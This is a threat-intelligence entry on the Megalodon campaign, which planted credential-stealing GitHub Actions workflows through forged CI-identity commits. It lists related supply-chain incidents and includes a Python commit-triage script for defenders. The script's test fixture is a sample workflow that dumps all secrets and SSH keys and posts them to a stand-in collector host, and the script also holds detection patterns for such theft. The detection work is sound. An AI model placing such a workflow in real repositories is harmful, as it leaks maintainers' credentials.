Megalodon GitHub CI/CD supply-chain campaign
Campaign
Summary
The Megalodon campaign pushed 5,718 malicious commits into 5,561 GitHub repositories in about six hours, creating a broad CI/CD secret-theft risk across developer projects. Attackers used throwaway accounts and forged CI-style author identities to hide malicious GitHub Actions workflows inside ordinary-looking commits. Once merged, the workflows executed in pipelines and exfiltrated cloud credentials, SSH keys, OIDC tokens, and source-code secrets to a remote C2 server. The scale and automation make many repositories repeatable secret-harvesting targets.
Related Happenings
TrapDoor trap-core.js credential-stealing package malware
Malware Activity
First: 25.05.2026 08:59
Last: 25.05.2026 08:59
Sources 1
About this happening:
The **TrapDoor** package malware is spreading across **npm, PyPI, and Crates.io**, putting **developer secrets, cloud credentials, SSH keys, and crypto wallets** at risk. The malw...
TrapDoor cross-ecosystem supply-chain campaign
Campaign
First: 25.05.2026 08:59
Last: 25.05.2026 08:59
Sources 1
About this happening:
The **TrapDoor** supply-chain campaign has expanded across **npm, PyPI, and Crates.io**, using **34+ malicious packages** to steal developer secrets and credentials. The operation...
Laravel Lang credential-stealer dropper delivered through malicious Composer packages
Malware Activity
First: 23.05.2026 23:48
Last: 23.05.2026 23:48
Sources 1
About this happening:
A **malicious Composer payload** in **Laravel Lang** packages now threatens **Linux, macOS, and Windows** developers with credential theft. The injected `src/helpers.php` dropper...
TeamPCP supply-chain ecosystem shift and extortion partnerships
Threat Actor Meta
First: 22.05.2026 14:55
Last: 22.05.2026 14:55
Sources 1
How related:
The development comes as TeamPCP has weaponized the interlinked software supply chain to corrupt hundreds of open-source tools, worming their way through several ecosystems and extorting victims for profit in some cases.
About this happening:
**TeamPCP** has expanded its supply-chain abuse model across open-source ecosystems, raising the risk of downstream compromise and extortion at scale. The group has **corrupted hu...
GitHub data exposed after GitHub breach
Data Leak
First: 20.05.2026 11:14
Last: 20.05.2026 11:14
Sources 1
About this happening:
GitHub confirmed **exfiltration** of **internal repositories**, making private code and related content potentially available to outsiders. Attackers on the **Breached cybercrime...
Timeline
- 22.05.2026 14:55 · 2 articles · 5d ago
Initial report: Megalodon GitHub CI/CD supply-chain campaign
Initial Disclosure: The first phase focused on slipping malicious commits into repositories under forged CI-style identities. Those commits planted GitHub Actions workflows that could execute after merge and immediately start harvesting credentials from build environments.
- Megalodon GitHub Attack Targets 5,561 Repos with Malicious CI/CD Workflows — thehackernews.com — 22.05.2026 14:55
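The first-phase behaviour described in the summary and in the timeline entry above (CI-style author identities carrying workflow files that run after merge and ship credentials off the runner) lends itself to a commit-triage check a repository owner can run before merging. The script below is an added example for this page, not code from the page or from the reporting it cites. Everything in it is constructed for the illustration: the commit records (shaped loosely like the fields a git host's commit API exposes: sha, author, signature verification state, changed files), both workflow bodies, the `collector.example.invalid` host, the identity patterns, and the allow-list of trusted hosts.

```python
"""Triage commits for Megalodon-style indicators (added example, constructed data).
Two checks: (1) an author string that impersonates a CI/bot identity while the
commit carries no verified signature; (2) a workflow file that reads secrets or
local credential material and also sends data to a host outside an allow-list."""
import re

# Author strings that look like CI or bot identities (assumed heuristic list).
CI_IDENTITY_RE = re.compile(r"(\[bot\]|github-actions|dependabot|actions@github\.com)", re.I)
WORKFLOW_PATH_RE = re.compile(r"^\.github/workflows/[^/]+\.ya?ml$")
# Workflow-body indicators.
SECRETS_CONTEXT_RE = re.compile(r"\$\{\{\s*(toJSON\(\s*secrets\s*\)|secrets\.[A-Za-z0-9_]+)\s*\}\}")
DUMP_ALL_SECRETS_RE = re.compile(r"toJSON\(\s*secrets\s*\)")
LOCAL_CRED_RE = re.compile(r"(~/\.ssh|\.aws/credentials|ACTIONS_ID_TOKEN_REQUEST_TOKEN)")
OUTBOUND_RE = re.compile(r"\b(curl|wget|Invoke-WebRequest)\b[^\n]*?(https?://[^\s'\"]+)")
# Hosts a workflow may legitimately talk to (assumed allow-list; tune per organisation).
TRUSTED_HOSTS = {"github.com", "api.github.com", "objects.githubusercontent.com"}


def _untrusted_host(line):
    """Host of an outbound curl/wget target on this line, unless it is allow-listed."""
    m = OUTBOUND_RE.search(line)
    if not m:
        return None
    host = re.sub(r"^https?://", "", m.group(2)).split("/")[0].split(":")[0].lower()
    return None if host in TRUSTED_HOSTS else host


def scan_workflow(text):
    """Return human-readable reasons a workflow body looks like a secret harvester."""
    reasons = []
    if DUMP_ALL_SECRETS_RE.search(text):
        reasons.append("dumps the entire secrets context with toJSON(secrets)")
    if LOCAL_CRED_RE.search(text):
        reasons.append("references local credential material (SSH keys, cloud creds, OIDC token)")
    reads_secrets = bool(SECRETS_CONTEXT_RE.search(text) or LOCAL_CRED_RE.search(text))
    hosts = sorted({h for h in map(_untrusted_host, text.splitlines()) if h})
    if reads_secrets and hosts:
        reasons.append("reads secrets and sends data to untrusted host(s): " + ", ".join(hosts))
    return reasons


def triage_commit(commit):
    """Return reasons a commit record deserves a human look (empty list = nothing found)."""
    reasons = []
    ident = f"{commit['author_name']} <{commit['author_email']}>"
    if CI_IDENTITY_RE.search(ident) and not commit.get("verified", False):
        reasons.append(f"CI-style author identity without a verified signature: {ident}")
    for path, body in commit.get("files", {}).items():
        if WORKFLOW_PATH_RE.match(path):
            reasons.extend(f"{path}: {r}" for r in scan_workflow(body))
    return reasons


def triage_commits(commits):
    """Map sha -> reasons for every commit that raised at least one reason."""
    return {c["sha"]: r for c in commits if (r := triage_commit(c))}


# Constructed fixtures: one harvester-style workflow, one ordinary release workflow.
MALICIOUS_WORKFLOW = """name: build
on: [push, pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: echo '${{ toJSON(secrets) }}' > /tmp/s.json
      - run: tar czf /tmp/b.tgz /tmp/s.json ~/.ssh
      - run: curl -s -X POST --data-binary @/tmp/b.tgz http://collector.example.invalid/upload
"""
BENIGN_WORKFLOW = """name: release
on: [push]
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm publish
        env:
          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
      - run: curl -sS https://api.github.com/repos/example/app/releases
"""
SAMPLE_COMMITS = [
    {"sha": "aaaa1111", "author_name": "github-actions[bot]",
     "author_email": "actions@github.com", "verified": False,
     "files": {".github/workflows/build.yml": MALICIOUS_WORKFLOW}},
    {"sha": "bbbb2222", "author_name": "Jane Dev", "author_email": "jane@example.com",
     "verified": True,
     "files": {".github/workflows/release.yml": BENIGN_WORKFLOW, "README.md": "# app\n"}},
]

if __name__ == "__main__":
    for sha, reasons in triage_commits(SAMPLE_COMMITS).items():
        print(sha)
        for r in reasons:
            print("  -", r)
```

On real data the `verified` flag should come from the host's own signature verification of the commit, and the allow-list needs to reflect the registries and APIs your pipelines genuinely use; the benign fixture shows why both matter, since a legitimate release workflow also touches a secret and also makes an outbound call. Treat the output as triage leads for a reviewer, not as a verdict, and pair it with branch protection that requires review before any change under `.github/workflows/` can run.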